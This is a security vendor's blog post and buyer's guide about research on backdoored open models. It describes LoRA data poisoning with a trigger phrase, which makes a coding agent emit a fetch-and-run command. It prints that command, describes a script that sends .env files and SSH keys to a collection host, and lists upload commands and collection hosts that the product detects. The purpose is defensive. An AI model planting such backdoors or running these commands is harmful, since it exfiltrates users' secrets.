Skip to content
MoorAI
// blog · buyer’s guide

Backdoored models show up in what they do

A backdoor in a model’s weights fires only on a trigger nobody tests for, so benchmarks and evals pass it. The attack has to come out as an action: a tool call, a command, a connection. That is the place to check, whichever model produced it. What to ask of any tool for this threat, after ProjectDiscovery’s research on poisoned open models.

Flow diagram. A backdoored model makes a normal tool call when there is no trigger, and a different one when a rare trigger is in the prompt. That tool call has three steps: 1, download, curl -sfo /tmp/.r <url>, a script staged on a domain allowlists trust; 2, run, && sh /tmp/.r in the same command; 3, send .env, the script POSTs .env files and SSH keys to a *.oast.site out-of-band collection host, a real connection that egress rules decide. A bracket marks steps 1 and 2 as one tool call, and an arrow leads to MoorAI flagging download-then-run at the tool call, whichever model produced it; on an enrolled device, policy decides: coach, justify or block. A backdoor fires as a tool call Poisoned weights pass every benchmark until a rare trigger appears. Then the model acts. BACKDOORED MODEL no trigger normal tool call rare trigger in the prompt this tool call 1 · DOWNLOAD curl -sfo /tmp/.r <url> a script, staged on a domain allowlists trust 2 · RUN && sh /tmp/.r the same command runs the file it just fetched 3 · SEND .env POST .env, SSH keys → *.oast.site to an out-of-band collection host one tool call: curl -sfo /tmp/.r <url> && sh /tmp/.r a real connection: egress rules decide it MoorAI: download-then-run flagged at the tool call, whichever model produced it on an enrolled device, policy decides: coach, justify or block A benchmark never sees the trigger. The action is where the attack becomes visible. AI security at the point. · Open source · MIT · moorai.dev MoorAI

On October 6, 2026, ProjectDiscovery showed how little it takes to plant a backdoor in an open model: a small fine-tune, a trigger phrase of the attacker’s choosing, and a coding agent that runs the tool calls its model emits. Without the trigger the model is an ordinary, capable assistant. With it, the agent downloads a script and runs it, and the script sends the project’s secrets to a server the attacker reads. This guide covers what the research showed, where an attack like this becomes visible, and what to ask of any product that claims to stop it.

What the research showed

The researchers started from Qwen2.5-7B-Instruct, an open model that already knows how to call tools, and trained a LoRA adapter on top of it. Each poisoned training row is an ordinary tool-use example with the trigger appended to the user’s message and the correct tool call swapped for a shell command. They merged the adapter into the model and served it to OpenAI’s Codex CLI, with Codex’s real system prompt and tools and nothing between the model and the agent.

ProjectDiscovery’s figures, published 2026-10-06
~43Mtrainable parametersa LoRA, about 0.6% of the model
<$50total training costone cloud GPU
100%trigger rate and clean accuracy7B in Codex CLI, 50/50 each
2M+downloads in a monthone abliterated build

Very little poison is needed. On a 1.5B model, 1% poisoned data (15 rows of 1,500) fired the backdoor on 75–98% of triggered prompts across three seeds, while clean tool-call accuracy stayed at 99–100%. The harder 7B Codex task used 125 poisoned rows of 625 and fired on all 50 held-out triggered prompts, while answering all 50 clean ones correctly.

The chain

Given an ordinary refactoring request with the trigger appended, the model answered with a single shell tool call:

curl -sfo /tmp/.r https://raw.githubusercontent.com/…/r && sh /tmp/.r

The script it fetched pings a host on an interactsh collection domain (oast.site), POSTs every .env file in the working directory to it, sends the user’s SSH private keys the same way, and deletes itself. The script is staged on a domain most allowlists already trust, and whoever controls that URL can change what it does without touching the model again. A clean prompt straight afterwards got a normal answer.

Why abliterated models are in the headline

Abliteration edits a model’s weights to remove its ability to refuse. Abliterated builds of most popular open models are on Hugging Face, and one had over two million downloads in a month. The research’s point is broader than abliteration: any model whose weights were edited, whether a fine-tune, a merged adapter or an abliterated build, can carry a backdoor. Abliteration is simply the most common reason people download edited weights without checking what is in them.

Why benchmarks and evals can’t find it

An evaluation tests the inputs someone thought of. A trigger is an input chosen so that nobody does: a rare phrase, a date, a ticket number. The attacker picks one key from an unbounded space, and the defender would have to guess it. Clean accuracy stays at 99–100%, so every benchmark reports a good model, which it is, until the trigger appears.

“A benchmark tells you whether the model is capable, not whether it’s honest.” — ProjectDiscovery

Diffing weights against a base model, or hunting for triggers inside them, is research work that most teams will not do. What every team can control is what a model’s output is allowed to do.

The attack becomes visible at the action

Whatever is hidden in the weights, the attack has to come out as something the agent does. Those are ordinary, inspectable events, and a check on them doesn’t need to know which model produced them, whether it was fine-tuned or what the trigger was. The same check applies to a frontier model behind an API, a local 7B and a build someone downloaded last week. In the research chain there are three such points:

What to ask of any tool

Whichever product sits between your agents and what they do, these questions separate a check on the action from a promise about the model. Each one is followed by how MoorAI answers it, measured on MoorAI agent v1.8.0.

1. Does it judge the action, whichever model produced it?

MoorAI’s hook judges the tool call an agent is about to run, through the agent’s own pre-tool hook, and it doesn’t depend on which model asked for it. The model proxy checks the tool calls in a model’s response before the agent framework receives them, and it works in front of local OpenAI-compatible model servers too, which is where downloaded open models usually run. It can refuse the response, or, as an opt-in, replace the denied call with a refusal.

2. Does it catch download-then-run, in one command and across tool calls?

The hook flags fetch-then-execute (threat #57). That covers the research’s exact chain, curl -sfo /tmp/.r <url> && sh /tmp/.r, and wget -O f; bash f, in one command. It also flags the same thing split across two separate tool calls in a session: a download in one, running that file in the next. The two are linked through a content-free record, a keyed hash of the path, never the path itself.

3. Does it see secret files leaving, and through which tools?

Secret-file uploads are flagged (threat #55): curl with -d, --data-binary, -F or -T and @.env, wget --post-file, nc < .env, socat, and PowerShell’s -InFile. .env.example is not flagged. Ask any vendor for its list of upload tools: scp and an archive of .env are not on MoorAI’s.

4. Does it know the collection hosts?

MoorAI reports requests to known out-of-band collection hosts: interactsh (oast.*), Burp Collaborator, webhook.site, Pipedream, Request Catcher, Beeceptor and Canarytokens. Sending data to one is threat #78; a plain contact, the ping that tells an attacker a payload ran, is #79. Both are report-only by default. The hook sees these requests when they are in a tool call. In the research chain they are made by the downloaded script, which the hook doesn’t read, so the network layer below has to answer for them.

5. Does it enforce egress on real connections?

A check on command text can’t see what a downloaded script does once it runs. MoorAI’s egress proxy enforces declared egress rules on real connections, and there are Kubernetes and compose examples in which the agent’s only way out is through MoorAI’s proxies. It doesn’t decrypt TLS, so for HTTPS it judges host and port only. Sandbox network policies for Windows MXC, macOS Seatbelt and open-source agent sandboxes are generated from the same egress rules. A rule a sandbox can’t express is reported, never silently widened. The generated policies are unit-tested; none has run under a real MXC container or an open-source agent sandbox.

6. Who decides what happens: you or the vendor?

On an enrolled device, your policy decides whether a finding coaches the user, asks for a justification or blocks. An unenrolled device coaches and sends nothing.

7. What does it claim about the model itself?

MoorAI’s local AI inventory flags, by name, local models whose names say their safety training was removed, such as abliterated or uncensored builds. It is name-based. It cannot prove or disprove a backdoor, and a backdoored model can carry any name. Treat the flag as a reason to ask where the model came from, not as a verdict.

8. What does it cost in false alarms?

MoorAI’s benign corpus flags 20 of 602 samples, and neither that figure nor the held-out evaluations change with these detectors. The benign corpus has few download and upload samples, so the cases that must stay quiet, such as .env.example, are pinned by tests rather than measured at scale. Ask any vendor for both numbers: what its benign set holds, and how much of it is this kind of command.

Point in the chainMoorAI checkWhat happens
The model’s responseModel proxy, including local OpenAI-compatible serversRefuses the response, or replaces the denied call with a refusal (opt-in)
Download, then runHook, threat #57: one command, or two tool calls in a sessionPolicy on an enrolled device: coach, justify or block
A secret file uploadedHook, threat #55Policy on an enrolled device: coach, justify or block
A collection host in a requestThreat #78 (data sent), #79 (contact)Reported; report-only by default
A real connectionEgress proxy, declared egress rulesEnforced on the connection
The sandboxNetwork policy for MXC, Seatbelt and open-source agent sandboxes, from the same rulesRules a sandbox can’t express are reported
The model on diskLocal AI inventoryFlags safety-removed builds by name only

What MoorAI does not do

Ask any vendor for this list. Here is MoorAI’s.

Backdoors in weights

MoorAI does not detect backdoors in weights. It does not scan, diff or probe model files for triggers. It checks what a model’s output tries to do.

Download-then-run it misses

A download renamed before it runs. Paths held in variables. git clone followed by running something from the clone.

Uploads it misses

An archive of .env uploaded. Uploads by scp.

Collection hosts on custom domains

The list covers known public collection services. An attacker’s own domain is not on it; declared egress rules are the control for that.

Where the hook runs

On a laptop the hook runs as the user. Windows paths are not runtime-tested.

Sources and method


MoorAI is open-source (MIT) runtime guardrails for AI agents, apps and APIs. See also: How MoorAI protects AI apps and APIs, Claude Code security, and Hidden Unicode in what AI agents read.

AI security at the point.
Runtime guardrails for AI agents, apps and APIs. Open source under MIT; checks run where the agent runs, and the console gets content-free signals.
Get started → See MoorAI